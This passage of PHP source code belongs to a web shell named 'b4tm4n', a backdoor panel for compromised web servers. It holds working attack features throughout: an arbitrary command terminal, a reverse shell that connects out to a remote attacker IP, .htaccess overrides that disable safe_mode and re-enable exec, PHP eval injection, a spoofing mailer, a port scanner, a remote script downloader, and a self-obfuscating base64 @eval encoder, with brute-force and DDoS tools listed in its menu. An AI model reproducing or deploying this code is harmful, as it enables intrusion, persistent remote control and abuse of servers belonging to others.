}
if($_REQUEST['x']=="terminal")
{
printf("
<div id='terminal'>
<textarea id='prompt-terminal' class='cmd' cols='122' rows='20' readonly>%s</textarea>
<form onsubmit='return false;'>
<label id='curdir-terminal'>$ %s:</label>
<input type='text' id='terminal-input' autocomplete='off' onfocus=\"\" onkeydown=\"
if(event.keyCode==13)
{
temp=this.value;
this.value='';
getAjax(true,'curdir-terminal','POST','?x=terminal&xa=terminals-curdir&cmd='+temp);
return getAjax(false,'prompt-terminal','POST','?x=terminal&xa=terminals&cmd='+temp);
}
\" class='cmd' name=cmd cols=122 rows=2></input>
</form>
</div>",Execute('whoami'),$dir);
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals")
{
ob_clean();
$command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami";
@chdir($dir);
$charset='UTF-8';
if(!Unix())
{
$charset='Windows-1251';
}
$ret=iconv($charset,'UTF-8',Execute($command));
print $ret;
exit;
}
elseif(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals-curdir")
{
ob_clean();
$command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami";
if (preg_match('/cd (.*)/',$command,$dirx))
{
if ($dirx[1]=='..')
{
$dir=substr($dir,0,strrpos($dir,_));
if (strlen($dir)<=2) $dir=$dir._;
}
else
{
if (is_dir($dirx[1]))
{
$dir=realpath($dirx[1]);
}
}
}
$_SESSION['c']=urle($dir);
print '$ '.$dir.':';
exit;
}
}
if($_REQUEST['x']=="connect")
{
printf("<div id='connect'>
<div class='connect-left'>
<div class='Reverse-connect'>
<fieldset>
<legend>Reverse Connect</legend>
<form action='?x=connect&xa=reverse-connect' method='post' onsubmit=\"
return confirm('HOST will FUCKED ON ur PC or LAPTOP ?!\\nMake Sure ur FIREWALL OFF ?!\\nUSE NETCAT {nc -lvp ' + document.getElementById('reverse-port').value+'}\\n\\nTYPE \'exit\' or \'quit\' to TERMINATE')\">
<label>Remote Ip</label><input type='text' name='reverse-ip' value='%s'/><br>
<label>Remote Port</label><input type='text' id='reverse-port' name='reverse-port' value='1337'/><br>
<label>Socket</label><select name='socket'>
<option value='fsockopen'>fsockopen</option>
<option value='socket_create'>socket_create</option>
<option value='stream_socket_client'>stream_socket_client</option>
</select><br>
<input type='submit' value='Connect' />
</form>
</fieldset>
</div>
</div>
<div class='connect-right'>
<div class='status-connect'>
<fieldset>
<legend>Status</legend>
<div id='connect-result'>Terminal: %s",
remote_addr,Execute('whoami')
);
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="reverse-connect")
{
if($_REQUEST['socket']=="fsockopen")
{
$host=$_REQUEST['reverse-ip'];
$port=$_REQUEST['reverse-port'];
$sock=@fsockopen($host,$port,$errno,$errstr);
if($errno!=0)
{
printf("<font color='red'><b>%s</b>:%s</font>",$errno,$errstr);
}
else
{
while(!feof($sock))
{
fwrite($sock,"[b4tm4n]:");
$command=fgets($sock,1024);
if(trim($command)=='quit'||trim($command)=='exit')
{
fclose($sock);
printf($command);
exit;
}
fwrite($sock,Execute($command));
}
fclose($sock);
}
}
else if($_REQUEST['socket']=="socket_create")
{
$host=$_REQUEST['reverse-ip'];
$port=$_REQUEST['reverse-port'];
$sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
socket_set_nonblock($sock);
if(!$sock)
{
printf("<font color='red'>Connection Error</font>");
}
else
{
while(!@socket_connect($sock,$host,$port))
{
@socket_write($sock,"[b4tm4n]:",strlen ("[b4tm4n]:"));
$input=@socket_read($sock,1024,PHP_NORMAL_READ);
if (trim($input)=='quit'||trim($input)=='exit')
{
socket_set_block($sock);
socket_close($sock);
printf($input);
exit;
}
@socket_write($sock,Execute($input),strlen (Execute($input)));
}
socket_set_block($sock);
socket_close($sock);
}
}
else if($_REQUEST['socket']=="stream_socket_client")
{
$host=$_REQUEST['reverse-ip'];
$port=$_REQUEST['reverse-port'];
$sock=@stream_socket_client("tcp://$host:$port",$errno,$errstr);
if (!$sock)
{
printf("<font color='red'><b>%s</b>:%s</font>",$errno,$errstr);
}
else
{
while(!feof($sock))
{
fwrite($sock,"[b4tm4n]:");
$command=fgets($sock,1024);
if(trim($command)=='quit'||trim($command)=='exit')
{
fclose($sock);
printf($command);
exit;
}
fwrite($sock,Execute($command));
}
fclose($sock);
}
}
}
printf("</fieldset></div></div></div></div>");
}
if($_REQUEST['x']=="htaccess")
{
$php_ini=array(
"php_value upload_max_filesize 32M",
"php_value post_max_size 32M",
"php_flag safe_mode Off",
"php_value disable_functions null",
"php_flag safe_mode_gid Off",
"php_value open_basedir $dir",
"php_flag register_globals On",
"php_flag exec On",
"php_flag shell_exec On");
$htaccess=array(
"Options All",
"Allow From All",
"Satisfy Any");
printf("
<div class='divide'>
<div class='divide-left'>
<textarea>%s</textarea>
</div>
<div class='divide-right'>
<textarea>%s</textarea>
</div>
</div>",implode($php_ini,"\n"),implode($htaccess,"\n"));
}
if($_REQUEST['x']=="php")
{
$exp=array(
"print_r(get_extension_funcs('Core'));",
"print_r(get_loaded_extensions());",
"print_r(ini_get_all('pcre'));",
"print_r(ini_get_all());",
"print_r(get_defined_constants());",
"print_r(get_defined_functions());",
"print_r(get_declared_classes());");
printf("<div id='php'>
<form onsubmit='return false;'>
<div class='php-left'>
<textarea id='php-code' cols='122' rows='20'>%s</textarea>
</div>
<div class='php-right'>
<textarea id='php-eval' cols='122' rows='20' readonly></textarea>
</div>
<input type='submit' id='php-submit' onclick=\"getAjax(false,'php-eval','POST','?x=php&codex='+document.getElementById('php-code').value);\" class='php-code' name=php-code cols=122 rows=20 value='Inject'/>
<input type='submit' id='php-submit' onclick=\"getAjax(false,'php-eval','POST','?x=php&code='+document.getElementById('php-code').value);\" class='php-code' name=php-code cols=122 rows=20 value='Run'/>
</form>
</div>",implode($exp,"\n"));
if(any("code",$_REQUEST))
{
ob_clean();
$code=trim($_REQUEST['code']);
$evil=Evil($code);
exit;
}
if(any("codex",$_REQUEST))
{
ob_clean();
$code=trim($_REQUEST['codex']);
$evil=Evil($code,true);
exit;
}
}
if($_REQUEST['x']=="perl")
{
print 'PHP Perl Class: '.(class_exists('Perl')?"<b class='on'>ON</b>":"<b class='off'>OFF</b>").'<br>';
if(Unix())
{
if(file_exists("/usr/bin/perl"))
{
$path_perl="/usr/bin/perl";
}
else
{
$path_perl="/usr/bin/env perl";
}
}
else
{
if(file_exists("C:\\perl\bin\perl.exe"))
{
$path_perl="C:\\perl\bin\perl.exe";
}
elseif(file_exists("C:\\wamp\bin\perl.exe"))
{
$path_perl="C:\\wamp\bin\perl.exe";
}
elseif(file_exists("C:\\xampp\perl\bin\perl.exe"))
{
$path_perl="C:\\xampp\perl\bin\perl.exe";
}
}
$script=array(
"#!$path_perl",
"use strict;",
"use warnings;",
"use CGI;",
"print CGI::header();",
"print 'k4mpr3t on CGI';");
$htaccess=array(
"Options +ExecCGI +SymLinksIfOwnerMatch",
"DirectoryIndex index.ler",
"AddType application/x-httpd-cgi .ler",
"AddHandler cgi-script .ler");
$path=$dir._.'cgi-bin';
$file=$path._.'perl.ler';
$file2=$path._.'.htaccess';
$scripts=implode($script,"\n");
$htaccesss=implode($htaccess,"\n");
if(!is_dir($path))
{
mkdir($path,0755);
}
if(!is_file($file))
{
$op=fopen($file,'w+');
fwrite($op,$scripts);
fclose($op);
chmod($file,0755);
}
if(!is_file($file2))
{
$op=fopen($file2,'w+');
fwrite($op,$htaccesss);
fclose($op);
chmod($file2,0755);
}
$redirect=GetUrlFromPath($file);
printf("Tested -> <a href='$redirect' target='_blank'><u>Link</u></a>");
if (class_exists('Perl'))
{
//$perl=Perl::getInstance();
$perl=new Perl();
$perl->eval("print \"Executing Perl code in PHP\n\"");
print "Hello from PHP! ";
//$perl=new Perl();
$perl->require($file);
$val=$perl->somePhpFunc('test');
print $val;
}
}
if($_REQUEST['x']=="mail")
{
printf("
<div class='divide'>
<div class='divide-left'>
<fieldset>
<legend>Mail</legend>
<form onsubmit='return false;' class='mail'>
<label>From</label><input type='text' id='email-from' placeholder='Attacker <very@handsome.com>' value='Attacker <very@handsome.com>'/><br>
<label>Reply To</label><input type='text' id='email-reply' placeholder=very@handsome.com' value='very@handsome.com'/><br>
<label>To</label><input type='text' id='email-to' placeholder='Target 1 <target1@target.com>,Target 2 <target2@target.com>' value=''/><br>
<label>Cc</label><input type='text' id='email-cc' placeholder='target1@target.com,target2@target.com' value=''/><br>
<label>Bcc</label><input type='text' id='email-bcc' placeholder='target1@target.com,target2@target.com' value=''/><br>
<label>Subject</label><input type='text' id='email-subject' placeholder='What You Waiting For ?' value=''/><br>
<label>Attachment (FIlename)</label><input type='text' id='email-attachment' placeholder='%s' value=''/><br>
<label>Messages</label><input type='text' id='email-message'/><br>
<input type='submit' value='Send' onclick=\"
getAjax(true,
'send-result',
'POST',
'?x=mail&xa=send'+
'&from='+document.getElementById('email-from').value+
'&reply='+document.getElementById('email-reply').value+
'&to='+document.getElementById('email-to').value+
'&cc='+document.getElementById('email-cc').value+
'&bcc='+document.getElementById('email-bcc').value+
'&subject='+document.getElementById('email-subject').value+
'&message='+document.getElementById('email-message').value+
'&attachment='+document.getElementById('email-attachment').value);
\"/>
</form>
</fieldset>
</div>
<div class='divide-right'>
<fieldset>
<legend>Result's</legend>
<div id='send-result'></div>
</fieldset>
</div>
</div>
",php_self);
if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='send')
{
ob_clean();
$from=$_REQUEST['from'];
$reply=$_REQUEST['reply'];
$to=$_REQUEST['to'];
$cc=$_REQUEST['cc'];
$bcc=$_REQUEST['bcc'];
$subject=$_REQUEST['subject'];
$msg=$_REQUEST['message'];
$attachment=$_REQUEST['attachment'];
$uid=md5(uniqid(time()));
$headers[]="From: $from";
$headers[]="Reply-To: $reply";
$headers[]="To: $to";
if(!empty($cc)) $headers[]='Cc: $cc';
if(!empty($bcc)) $headers[]='Bcc: $bcc';
$headers[]="MIME-Version: 1.0";
$headers[]="Content-Type: multipart/mixed; boundary=\"$uid\"";
$messages[]="--$uid";
$messages[]="Content-type: text/html; charset=\"iso-8859-1\"";
$messages[]="Content-Transfer-Encoding: 8bit";
$messages[]="";
$messages[]="$msg";
$messages[]="";
if(is_file($attachment))
{
$content=file_get_contents($attachment);
$content=chunk_split(B64E($content));
$name=basename($attachment);
$mime=mime_content_type($attachment);
$messages[]="--$uid";
$messages[]="Content-Type: $mime; name=\"$name\"";
$messages[]="Content-Transfer-Encoding: base64";
$messages[]="Content-Disposition: attachment";
$messages[]="";
$messages[]="$content";
$messages[]="";
$messages[]="--$uid--";
}
$message=implode("\r\n",$messages);
$header=implode("\r\n",$headers);
if(mail($to,$subject,$message,$header))
{
print "Email Send";
}
else
{
$error=error_get_last();
print "Error :" . $error['message'];
}
exit;
}
}
if($_REQUEST['x']=='process')
{
printf("<div id='process-kill'><form class='new' method='post' action='?x=process&xa=kill'>
<label>PID</label> <input type='text' name='pid'/>
<input type='submit' value='Kill'/><br>
<label>Name</label> <input type='text' name='name'/>
<input type='submit' value='Kill'/>
</form></div>");
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="kill")
{
$pid=$_REQUEST['pid'];
$name=$_REQUEST['name'];
if(Unix())
{
$kill=Execute("kill 9 $pid");
$kill=Execute("kill 9 $name");
if($kill) print '<font class="off">Process Killed</font>';
}
else
{
$kill=Execute("taskkill /f /pid $pid");
$kill=Execute("taskkill /f /im $name");
if($kill) print '<font class="off">Process Killed</font>';
}
}
if(Unix())
{
$ret=iconv('UTF-8','UTF-8',Execute('ps aux'));
print '<div id="process-list"><pre>'.$ret.'</pre></div>';
}
else
{
$ret=iconv('Windows-1251','UTF-8',Execute('tasklist'));
print '<div id="process-list"><pre>'.$ret.'</pre></div>';
}
}
if($_REQUEST['x']=='shells')
{
print "Coming Soon";
}
if($_REQUEST['x']=='symlink')
{
print "Coming Soon";
}
if($_REQUEST['x']=="account")
{
printf("<div id='account'><form class='new' method='post' action='?x=account&xa=change'>
<label>Username</label> <input type='text' name='change-username' autocomplete='off' value='%s'/> <br>
<label>Password</label> <input type='text' name='change-password' autocomplete='off'value=''/><br>
<input type='submit' value='Change' onclick=\"return confirm('Sure ?');\"/>
</form></div>",B64D($account[0]));
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="change")
{
$filename=script_filename;
$username=$_REQUEST['change-password'];
$password=$_REQUEST['change-username'];
if (!empty($username)&&!empty($password))
{
$user_from=$account[0];
$user_to=B64E($password);
$content=file_get_contents($filename);
$chunk=explode($user_from,$content);
$content=implode($user_to,$chunk);
$change=file_put_contents($filename,$content);
$pass_from=$account[1];
$pass_to=sha1(md5($username));
$content=file_get_contents($filename);
$chunk=explode($pass_from,$content);
$content=implode($pass_to,$chunk);
$change=file_put_contents($filename,$content);
if($change)
{
session_destroy();
session_regenerate_id();
header('location:'.php_self);
}
else
{
printf("Error change account");
}
}
else
{
printf("<b class='off'>Mistakes !</b>");
}
}
}
if($_REQUEST['x']=="action")
{
$files=any('chk',$_REQUEST)?$_REQUEST['chk']:array();
$value=any('action-value',$_REQUEST)?$_REQUEST['action-value']:$_REQUEST['action-option'];
$tmp="";
$row="";
$count_dirs=0;
$count_files=0;
foreach($files as $file)
{
if(is_dir(urld($file)))
{
$count_dirs++;
}
if(is_file(urld($file)))
{
$count_files++;
}
$row.="<tr><td>".urld($file)."</td></tr>";
$tmp.=urld($file).",";
}
if(count($files)==1&&$value=='copy')
{
header('location:'.php_self.'?a=cp&r='.$files[0]);
}
if(count($files)==1&&$value=='move')
{
header('location:'.php_self.'?a=mv&r='.$files[0]);
}
if(!any('xa',$_REQUEST)&&$value=='delete')
{
printf("<h4>Dir's: [%s] File's: [%s]</h4>
<table class='table'>%s</table>
<form class='new' method='post' action='?x=action&xa=option'>
<input type='hidden' name='action-option' value='%s'/>
<input type='hidden' name='tmp' value='%s'/>
<input type='submit' value='Remove'/>
</form>",
$count_dirs,
$count_files,
$row,
$value,
$tmp);
}
if(!any('xa',$_REQUEST)&&$value!='delete')
{
printf("<h4>Dir's: [%s] File's: [%s]</h4>
<table class='table'>%s</table>
<form class='new' method='post' action='?x=action&xa=option'>
<script>window.onload=function(e){document.getElementById('action_option').value='%s'}</script>
<select name='action-option' id='action_option'>
<option value='copy'>Copy</option>
<option value='move'>Move</option>
<option value='zip'>Archive (zip)</option>
<option value='unzip'>Extract to (zip)</option>
</select>
<i>-></i>
<input type='hidden' name='tmp' value='%s'/>
<input type='text' name='newloc' value='%s'/>
<input type='submit' value='Process'/>
</form>",
$count_dirs,
$count_files,
$row,
$value,
$tmp,
$dir._);
}
if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='option')
{
$files=array_filter(explode(',',$_REQUEST['tmp']));
$newloc=trim(@$_REQUEST['newloc']);
$succ=0;
$fail=0;
if($_REQUEST['action-option']=='copy')
{
if(file_exists($newloc)&&is_dir($newloc))
{
foreach($files as $file)
{
if(CopyRecursive($file,rtrim($newloc,_)._.basename($file)))
{
$succ++;
}
else
{
$fail++;
}
}
print "Success: $succ | Failed: $fail";
}
else
{
print "Target not exists !";
}
}
if($_REQUEST['action-option']=='move')
{
if(file_exists($newloc)&&is_dir($newloc))
{
foreach($files as $file)
{
if(MoveRecursive($file,rtrim($newloc,_)._.basename($file)))
{
$succ++;
}
else
{
$fail++;
}
}
print "Success: $succ | Failed: $fail";
}
else
{
print "Target not exists !";
}
}
if($_REQUEST['action-option']=='delete')
{
foreach($files as $file)
{
if(Remove($file))
{
$succ++;
}
else
{
$fail++;
}
}
print "Success: $succ | Failed: $fail";
}
if($_REQUEST['action-option']=='zip')
{
if(pathinfo($newloc)['extension']=='zip')
{
$zip=new ZipArchive;
if ($zip->open($newloc,ZipArchive::CREATE|ZipArchive::OVERWRITE)===TRUE)
{
foreach($files as $file)
{
if(is_dir($file))
{
$zip->addEmptyDir(basename($file));
$recur=new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($file),
RecursiveIteratorIterator::LEAVES_ONLY
);
foreach ($recur as $key => $val)
{
if(basename($key)!="..")
{
if(is_dir($key))
{
$zdir=str_replace($file,basename($file),realpath($key));
$zip->addEmptyDir($zdir);
}
elseif(is_file($key))
{
$zfile=str_replace($file,basename($file),realpath($key));
$zip->addFile(realpath($key),$zfile);
}
}
}
}
elseif(is_file($file))
{
$zip->addFile($file,basename($file));
}
}
$zip->close();
print 'Zip Created';
}
else
{
print 'Failed';
}
}
else
{
print 'Extension must Zip';
}
}
if($_REQUEST['action-option']=='unzip')
{
if(file_exists($newloc)&&is_dir($newloc))
{
foreach($files as $file)
{
if(pathinfo($newloc)['extension']=='zip')
{
$zip=new ZipArchive;
if ($zip->open($file)===TRUE)
{
$zip->extractTo($newloc);
$zip->close();
$succ++;
}
else
{
$fail++;
}
}
else
{
$fail++;
}
}
print "Success: $succ | Failed: $fail";
}
else
{
print "Target not exists !";
}
}
}
}
if($_REQUEST['x']=="find")
{
$recur=new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($dir),
RecursiveIteratorIterator::LEAVES_ONLY
);
if(any('find-value',$_REQUEST)&&!empty($_REQUEST['find-value']))
{
$result="";
$res_=0;
foreach ($recur as $key => $val)
{
if(basename($key)!="..")
{
if(strpos(realpath($key),$_REQUEST['find-value'])!== false)
{
$result.=sprintf("<tr>
<td></td>
<td><a href='?g=%s' title='%s' target='_blank'>%s</a></td>
<td><a href='?g=%s' title='%s' target='_blank'>%s</a></td>
<td><center>%s</center></td>
</tr>",
substr(realpath($key),0,strrpos(realpath($key),_)),
substr(realpath($key),0,strrpos(realpath($key),_)),
substr(realpath($key),0,strrpos(realpath($key),_)),
realpath($key),
realpath($key),
basename(realpath($key)),
GetFileTime(realpath($key),'modify')
);
$res_++;
}
}
}
printf("
<form class='new' method=POST action='?x=find'>
<input type='text' name='find-value' id='find-action' value='%s'/><input type='submit' name='find-button' value='Find'/>
<label style='margin-left:10px'><font class='on'>Find: '%s' | Found's: %s</font></label>
</form>
<div class='auto-number'>
<table class='table sortable'>
<thead>
<tr>
<th class='sorttable_nosort' width='15'>No.</th>
<th>Directory</th>
<th>Name</th>
<th>Modified</th>
</tr>
<tbody>%s</tbody>
</table>
</div>",$_REQUEST['find-value'],$_REQUEST['find-value'],$res_,$result);
}
else
{
print "<form class='new' method=POST action='?x=find'>
<input type='text' name='find-value'/><input type='submit' name='find-button' value='Find'/>
<label style='margin-left:10px'><font color='red'>Whoops, Nothing to Found's !</font></label>
</form>";
}
}
if($_REQUEST['x']=="update")
{
$link_update='https://raw.githubusercontent.com/k4mpr3t/b4tm4n/master/bat.php';
$current_version=2.7; //New Version Released
if($config['debug']==true)
{
$latest_version=$current_version+0.1; //Test Update latest version -/+ 0.1
}
else
{
$git_script=GetUrlContent($link_update);
$get_version=strpos($git_script,"current_version");
$version=substr($git_script,$get_version+16,3);
$latest_version=is_numeric($version)?$version:$current_version;
}
$status="";
if((float)$latest_version>(float)$current_version)
{
if($config['debug']==true)
{
$status.='New Version Available '.$latest_version.'<br>Setting Debug to False for Activate this Feature';
}
else
{
$status.='New Version Available '.$latest_version.'<br>Download -> [<font class="on"><a href="'.$link_update.'" target="_blank">link</a></font>]';
}
}
else
{
$status.='Latest Version '.$current_version;
}
Printf("<div id='update'>
<a href='https://www.gnu.org/licenses/gpl-3.0.txt' target='_blank' title='License'>
<img src='https://www.gnu.org/graphics/lgplv3-88x31.png'/>
</a><br><br>%s
</div>",$status);
}
if($_REQUEST['x']=="self-encryptor")
{
if($php_script=htmlentities(@file_get_contents(__FILE__)))
{
$asu=strpos($php_script,$_SESSION["action"]["password"]);
$temp=substr($php_script,$asu+48);
$rand="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(1,3));
$rand2="\$".substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"),0,rand(2,5));
$_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4";
$_g="_";$_h="e";$_i="n";$_j="c";$_k="o";$_l="d";$_m="e";
$b64e=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m;
$b64d=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_l.$_m.$_j.$_k.$_l.$_m;
$b64=array(
'"\142\141\163\x65\66\x34\137\x64\x65\x63\157\144\145"',
'strrev("ed"."oce"."d_4"."6es"."ab")',
'strrev("e"."doc"."ed_"."46e"."sab")',
'"b"."as"."e6"."4_"."d"."ec"."o"."de"',
'"ba"."se"."6"."4_d"."e"."cod"."e"'
);
$rand_b64=array_rand($b64);
$rand3=$b64[$rand_b64];
$var1=$rand.'="'.$_SESSION["action"]["username"].':'.$_SESSION["action"]["password"].'";';
$var2=$rand2.'='.$rand3.';';
$var=array(
$var1.$var2,
$var2.$var1
);
$rand_var=array_rand($var);
$rand4=$var[$rand_var];
$self=preg_replace("/\\\$x_/",$rand,$temp); // Change Variable $x_ to Random
$src_='';
$src_.='<?php ';
$src_.=$rand4;
$src_.='@eval('.$rand2.'("';
$src_.=$b64e(htmlspecialchars_decode($self));
$src_.='"))';
$src_.='?>';
$name=!empty($_REQUEST['name'])?$_REQUEST['name']:'bat_encrypt.php';
$file=dirname(__FILE__)._.$name;
$op=fopen($file,'w+');
fwrite($op,$src_);
fclose($op);
printf("<center class='on'>SELF ENCRYPT CREATED !!!</center>
<center class='on'>
Link -> <a href='%s' target='_blank'><u>%s</u></a>
</center>",GetUrlFromPath($file),$name);
}
else
{
print "<center class='off'>SELF ENCRYPT ENABLE !!!</center>";
}
}
}
/* START CUSTOM TOOLZ */
if(any("z",$_REQUEST))
{
$z=$_REQUEST['z'];
print MenuTools(array(
"target-map"=>array("title"=>"Target Map","ver"=>"2.0","auth"=>"k4mpr3t"),
"port-scanner"=>array("title"=>"Scan Port","ver"=>"1.0","auth"=>"k4mpr3t"),
"script-loader"=>array("title"=>"Script Loader","ver"=>"1.0","auth"=>"k4mpr3t"),
"encryptor"=>array("title"=>"Encryptor","ver"=>"1.1","auth"=>"k4mpr3t"),
"form-bruteforces"=>array("title"=>"Form Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"),
"login-bruteforces"=>array("title"=>"Login Bruteforces","ver"=>"1.0","auth"=>"k4mpr3t"),
"mass-tools"=>array("title"=>"Mass Tools","ver"=>"1.0","auth"=>"k4mpr3t"),
"ddos-attack"=>array("title"=>"DDOS Attack","ver"=>"2.0","auth"=>"k4mpr3t"),
));
print "<div id='tools'>";
if(empty($z))
{
printf("<div id='thanks'>
<h2>Nothing Is Secure...</h2>
<h3>WHY SO serious ?!</h3>
</div>");
}
if($z=="target-map")
{
print "<div class='tools-header'>
<h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
<h3> by: ".$menu_tools[$z]['auth']."</h3>
</div>";
printf("<div id='target-map'>
<form onsubmit='return false;' class='new'>
<input type='text' id='map-ip' value='%s'/>
<input type='submit' value='Trace' onclick=\"return getAjax(true,'target-info','POST','?z=target-map&ip='+document.getElementById('map-ip').value);\"/><br>
</form>
</div>
<div id='target-info' class='result'></div>",gethostbyname(http_host));
if(any("ip",$_REQUEST))
{
ob_clean();
$ip=!empty($_REQUEST['ip']) ? $_REQUEST['ip'] : gethostbyname(http_host);
$valid=filter_var($ip,FILTER_VALIDATE_IP) or die('Invalid IP Address');
if($_REQUEST['ip']==gethostbyname(http_host))
{
$url=B64D("zSI9xWleO7odODUdzH4qy79ezmMeyr1=");
$geoip=GetUrlContent($url);
$json=json_decode($geoip,true);
}
else
{
$url=sprintf(B64D("zSI9xWleO7odODUdzH4qy79ezmMeyr1=")."%s",$ip);
$geoip=GetUrlContent($url);
$json=json_decode($geoip,true);
}
$url=sprintf(B64D("zSI9xSN3Ob0gBCYaOnwey7whAH4kwX0gBCYa")."?q=%s,%s&z=10&output=embed",$json['lat'],$json['lon']);
printf("<div class='divide'>
<div class='divide-left'>
<table class='table'>
<tr><td>AS</td><td>%s</td></tr>
<tr><td>City</td><td>%s</td></tr>
<tr><td>Country</td><td>%s</td></tr>
<tr><td>Country Code</td><td>%s</td></tr>
<tr><td>ISP</td><td>%s</td></tr>
<tr><td>Latitude</td><td>%s</td></tr>
<tr><td>Logitude</td><td>%s</td></tr>
</table>
</div>
<div class='divide-left'>
<table class='table'>
<tr><td>Origin</td><td>%s</td></tr>
<tr><td>IP</td><td>%s</td></tr>
<tr><td>Region</td><td>%s</td></tr>
<tr><td>Region Name</td><td>%s</td></tr>
<tr><td>Timezone</td><td>%s</td></tr>
<tr><td>Zip</td><td>%s</td></tr>
<tr><td>Status</td><td>%s</td></tr>
</table>
</div>
</div>
<iframe src='%s' width='100%%' height='345' frameBorder='0'><iframe>",
$json['as'],
$json['city'],
$json['country'],
$json['countryCode'],
$json['isp'],
$json['lat'],
$json['lon'],
$json['org'],
$json['query'],
$json['region'],
$json['regionName'],
$json['timezone'],
$json['zip'],
$json['status'],
$url);
exit;
}
}
if($z=="port-scanner")
{
print "<div class='tools-header'>
<h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
<h3> by: ".$menu_tools[$z]['auth']."</h3>
</div>";
printf("<div id='port-scan'>
<form onsubmit='return false;' class='new'>
<label>Host Port</label><input type='text' id='ip-port' value='%s'/><br>
<label>Start Port</label><input type='text' id='start-port' value='1'/><br>
<label>End Port</label><input type='text' id='end-port' value='65535'/><br>
<label>Methode</label><select id='scan-port'><option value='1'>socket_connect</option><option value='2'>fsockopen</option></select><br>
<input type='submit' onclick=\"return getAjax(true,'port-result','POST','?z=port-scanner&x=scan-port&ip='+document.getElementById('ip-port').value+'&sp='+document.getElementById('start-port').value+'&ep='+document.getElementById('end-port').value+'&mtd='+document.getElementById('scan-port').value);\" value=Scan />
<input type='submit' onclick=\"return ajaxAbort(true,'port-result')\" value=Cancel />
</form>
</div>
<div id='port-result' class='result'></div>",gethostbyname(http_host));
if(any("x",$_REQUEST)&&$_REQUEST['x']=="scan-port")
{
ob_clean();
$host=$_REQUEST['ip'];
$from=$_REQUEST['sp'];
$to =$_REQUEST['ep'];
$mtd =$_REQUEST['mtd'];
switch($mtd)
{
case '1':
if(function_exists('socket_create'))
{
$socket=@socket_create(AF_INET ,SOCK_STREAM ,SOL_TCP);
for($conn_port=$from;$conn_port <=$to;$conn_port++)
{
$conn=@socket_connect($socket ,$host,$conn_port);
if($conn)
{
print "<br>port $conn_port open";
socket_close($socket);
$socket=@socket_create(AF_INET ,SOCK_STREAM ,SOL_TCP);
}
}
}
else
{
print "Error socket_connect<br>";
}
break;
case '2':
for($conn_port=$from;$conn_port <=$to;$conn_port++)
{
$conn=@fsockopen($host,$conn_port);
if($conn)
{
print "<br>port $conn_port open";
fclose($conn);
}
}
break;
}
print "<br>Scan Finish.";
exit;
}
}
if($z=="script-loader")
{
print "<div class='tools-header'>
<h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
<h3> by: ".$menu_tools[$z]['auth']."</h3>
</div>";
$path=dirname(__FILE__)._.'script-loader';
if(!is_dir($path)) mkdir($path,0755);
$recur=new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path),
RecursiveIteratorIterator::LEAVES_ONLY
);
$result="";
foreach ($recur as $key => $val)
{
if(basename($key)!=".."&&basename($key)!=".")
{
$result.=sprintf("<tr>
<td></td>
<td><a href='%s' target='_blank'>%s</a></td>
<td><center>%s</center></td>
</tr>",
GetUrlFromPath(realpath($key)),
basename(realpath($key)),
GetFileTime(realpath($key),'modify')
);
}
}
printf("<div id='script-loader'>
<div class='divide'>
<div class='divide-left'>
<form onsubmit='return false;' class='new'>
<label>Url</label><input type='text' id='url-source' value=''/><br>
<label>Filename</label><input type='text' id='file-name' value=''/><br>
<input type='submit' onclick=\"return getAjax(true,'download-result','POST','?z=script-loader&url='+document.getElementById('url-source').value+'&filename='+document.getElementById('file-name').value);\"/><br>
<div id='download-result' class='result'></div>
</form>
</div>
<div class='divide-right'>
<fieldset>
<legend>List's</legend>
<div class='auto-number'>
<table class='table'>
<thead><tr><th>No.</th><th>Name</th><th>Modified</th>
<tbody>%s</tbody>
</table>
</div>
</fieldset>
</div>
</div>
</div>",$result);
if(any("url",$_REQUEST)&&any("filename",$_REQUEST))
{
ob_clean();
$url=$_REQUEST['url'];
$filename=$_REQUEST['filename'];
$dest=rtrim($path,_)._.$filename;
if(GetUrlExists($url)&&!empty($filename))
{
if(GetDownloadUrl($url,$dest))
{
$url=GetUrlFromPath($dest);
printf("Success -> <a href='$url' target='_blank'><u>Link</u></a>");
}
else
{
print "<br>Failed";
}
print "<br>Finish";
}
else
{
print "<br>Mistakes";
}
exit;
}
}
if($z=="encryptor")
{
print "<div class='tools-header'>
<h3>".$menu_tools[$z]['title']." v".$menu_tools[$z]['ver']."</h3>
<h3> by: ".$menu_tools[$z]['auth']."</h3>
</div>";
printf("<div id='script-loader'>
<form onsubmit='return false;' class='new'>
<div class='hash-control'>
<div class='hash'>
<input type='radio' name='encr' value='basic' checked><label>Basic</label>
<select id='basic-hash'>
<option value='md5'>Md5</option>
<option value='asc'>Char</option>
<option value='chr'>Ascii</option>
<option value='sha1'>Sha1</option>
<option value='crc32'>Crc32</option>
<option value='B64E'>B64E</option>
<option value='B64D'>B64D</option>
<option value='urlencode'>URL Encode</option>
<option value='urldecode'>URL Decode</option>
<option value='strlen'>String Length</option>
<option value='strrev'>String Reverse</option>
<option value='base64_encode'>Base64 Encode</option>
<option value='base64_decode'>Base64 Decode</option>
<option value='entties'>Htmlentities</option>
<option value='spechar'>Htmlspecialchars</option>
</select>
</div>
<div class='hash'>
<input type='radio' name='encr' value='extra'><label>Extra</label>
<select id='extra-hash'>
<option value='asc-hex'>Ascii => Hex</option>
<option value='asc-bin'>Ascii => Binary</option>
